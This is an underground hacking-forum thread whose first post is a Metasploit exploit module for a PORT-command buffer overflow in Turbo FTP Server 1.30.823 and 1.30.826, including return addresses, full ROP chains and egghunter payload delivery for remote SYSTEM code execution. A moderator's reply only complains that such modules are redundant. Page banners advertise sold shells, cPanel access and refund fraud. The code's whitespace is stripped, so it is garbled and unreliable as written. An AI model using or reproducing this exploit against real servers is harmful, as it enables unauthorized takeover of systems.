Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Turbo FTP Server 1.30.823 PORT Overflow filter_list
Author
Message
Stricker Offline
Member
Twelve Years of Service
Posts: 203
Threads: 78
Reputation: 0

Points: 0NSP
Turbo FTP Server 1.30.823 PORT Overflow 10-23-2012, 01:20 PM #1
Turbo FTP Server 1.30.823 PORT Overflow

Code:
##
#ThisfileispartoftheMetasploit
Frameworkandmaybesubjectto
#redistributionandcommercial
restrictions.Pleaseseethe
Metasploit
#websiteformoreinformationon
licensingandtermsofuse.
# http://metasploit.com/
##

require'msf/core'
classMetasploit3<
Msf::Exploit::Remote
Rank=GreatRanking
includeMsf::Exploit::Remote::Ftp
include
Msf::Exploit::Remote::Egghunter
definitialize(info={})
super(update_info(info,
'Name' =>'Turbo
FTPServer1.30.823PORTOverflow',
'Description' =>%q{
Thismodule
exploitsabufferoverflow
vulnerabilityfoundinthePORT
commandinTurboFTP
Server1.30.823&1.30.826,which
resultsinremote
codeexecutionunder
thecontextofSYSTEM.
},
'Author' =>
[
'ZhaoLiang',
#InitialDescovery
'Lincoln',
#Metasploit
'corelanc0d3r',
#Metasploit
'thelightcosine'
#Metasploit
],
'License' =>
MSF_LICENSE,
'Platform' =>[
'win'],
'References' =>
[
['OSVDB',
'85887']
],
'Payload' =>
{
'BadChars'
=>"\x00",
'EncoderType'
=>Msf::Encoder::Type::AlphanumMixed,
'EncoderOptions'
=>{'BufferRegister'=>'EDI'}
},
'Targets' =>
[
['Automatic',
{}],
['Windows
UniversalTurboFtp1.30.823',
{
'Ret'=>
0x00411985,#RETN(ROPNOP)
[tbssvc.exe]
'ver'=>
823
},
],
['Windows
UniversalTurboFtp1.30.826',
{
'Ret'=>
0x004fb207,#RETN(ROPNOP)
[tbssvc.exe]
'ver'=>
826
},
],
],
'DisclosureDate'=>'Oct
032012',
'DefaultTarget' =>0))
end
defcheck
connect
disconnect
if(banner=~/1\.30\.823/)
return
Exploit::CheckCode::Vulnerable
elsif(banner
=~/1\.30\.826/)
return
Exploit::CheckCode::Vulnerable
end
return
Exploit::CheckCode::Safe
end
defcreate_rop_chain(ver)
#ropchaingeneratedwith
mona.py-www.corelan.be
ifver==823
rop_gadgets=
[
0x004b692a,#POPECX
#RETN[tbssvc.exe]
0x005f6074,#ptrto
&VirtualAlloc()[IATtbssvc.exe]
0x0046f82a,#MOV
EDX,DWORDPTRDS:[ECX]#SUBEAX,EDX#
RETN[tbssvc.exe]
0x00423b95,#XCHG
EDX,EDI#RETN[tbssvc.exe]
0x00423a27,#XCHG
ESI,EDI#RETN[tbssvc.exe]
0x005d1c99,#POPEBP
#RETN[tbssvc.exe]
0x004cad5d,#&jmp
esp[tbssvc.exe]
0x004ab16b,#POPEBX
#RETN[tbssvc.exe]
0x00000001,#
0x00000001->ebx
0x005ef7f6,#POPEDX
#RETN[tbssvc.exe]
0x00001000,#
0x00001000->edx
0x005d7139,#POPECX
#RETN[tbssvc.exe]
0x00000040,#
0x00000040->ecx
0x004df1e0,#POPEDI
#RETN[tbssvc.exe]
0x00411985,#RETN
(ROPNOP)[tbssvc.exe]
0x00502639,#POPEAX
#RETN[tbssvc.exe]
0x90909090,#nop
0x00468198,#PUSHAD#
RETN[tbssvc.exe]
].flatten.pack("V*")
elsifver==826
rop_gadgets=
[
0x0050eae4,#POPECX
#RETN[tbssvc.exe]
0x005f7074,#ptrto
&VirtualAlloc()[IATtbssvc.exe]
0x004aa7aa,#MOV
EDX,DWORDPTRDS:[ECX]#SUBEAX,EDX#
RETN[tbssvc.exe]
0x00496A65,#XOR
EAX,EAX[tbssvc.exe]
0x004badda,#ADD
EAX,EDX#RETN[tbssvc.exe]
0x00411867,#XCHG
EAX,ESI#XOREAX,EAX#POPEBX#RETN
[tbssvc.exe]
0x00000001,#
0x00000001->ebx
0x0058a27a,#POPEBP
#RETN[tbssvc.exe]
0x004df7dd,#&call
esp[tbssvc.exe]
0x005f07f6,#POPEDX
#RETN[tbssvc.exe]
0x00001000,#
0x00001000->edx
0x004adc08,#POPECX
#RETN[tbssvc.exe]
0x00000040,#
0x00000040->ecx
0x00465fbe,#POPEDI
#RETN[tbssvc.exe]
0x004fb207,#RETN
(ROPNOP)[tbssvc.exe]
0x00465f36,#POPEAX
#RETN[tbssvc.exe]
0x90909090,#nop
0x004687ff,#PUSHAD#
RETN[tbssvc.exe]
].flatten.pack("V*")
end
returnrop_gadgets
end
defexploit
my_target=target
ifmy_target.name==
'Automatic'
print_status
("Automaticallydetectingthetarget")
connect
disconnect
if(banner
=~/1\.30\.823/)
my_target=targets[1]
elsif(banner
=~/1\.30\.826/)
my_target=targets[2]
end
if(notmy_target)
print_status("No
matchingtarget...quiting")
return
end
target=my_target
end
print_status("SelectedTarget:
#{my_target.name}")
connect_login
rop_chain=create_rop_chain
(target['ver'])
rop=rop_chain.unpack
('C*').join(',')
eggoptions=
{
:checksum=>true,
:eggtag=>'w00t',
:depmethod=>
'virtualalloc',
:depreg=>'esi'
}
badchars="\x00"
hunter,egg=
generate_egghunter(payload.encoded,
badchars,eggoptions)
speedupasm="movedx,eax\n"
speedupasm<<"sub
edx,0x1000\n"
speedupasm<<"subesp,0x1000"
speedup=
Metasm::Shellcode.assemble
(Metasm::Ia32.new,
speedupasm).encode_string
fasterhunter=speedup
fasterhunter<<hunter
print_status("Connectingto
target#{target.name}server")
buf1=rand_text_alpha(2012)
buf1<<egg
buf1<<rand_text_alpha(100)
buf2=rand_text_alpha
(4).unpack('C*').join(',')
buf2<<","
buf2<<[target['Ret']].pack
("V").unpack('C*').join(',')#eip
buf2<<","
buf2<<rop
buf2<<","
buf2<<fasterhunter.unpack
('C*').join(',')
buf2<<","
buf2<<rand_text_alpha
(90).unpack('C*').join(',')
send_cmd(['CWD',buf1],
true);
send_cmd(['PORT',buf2],
true);
print_status("Egghunter
deployed,locatingshellcode")
handler
disconnect
end
en d
[Image: deceptionorangeoverlay.png]

Reply

chmod Offline
chsupermod
Twelve Years of Service
Posts: 3,251
Threads: 64
Reputation: 0

Points: 0NSP
RE: Turbo FTP Server 1.30.823 PORT Overflow 10-23-2012, 01:27 PM #2
Again a metasploit exploit please don't post these as anyone with metasploit will aready have it and also can't use it without the framework so it's a waste of time posting them

Reply

Stricker Offline
Member
Twelve Years of Service
Posts: 203
Threads: 78
Reputation: 0

Points: 0NSP
RE: Turbo FTP Server 1.30.823 PORT Overflow 10-23-2012, 02:20 PM #3
Ok bro,i will post other exploit,thanks.
[Image: deceptionorangeoverlay.png]

Reply







Users browsing this thread: 1 Guest(s)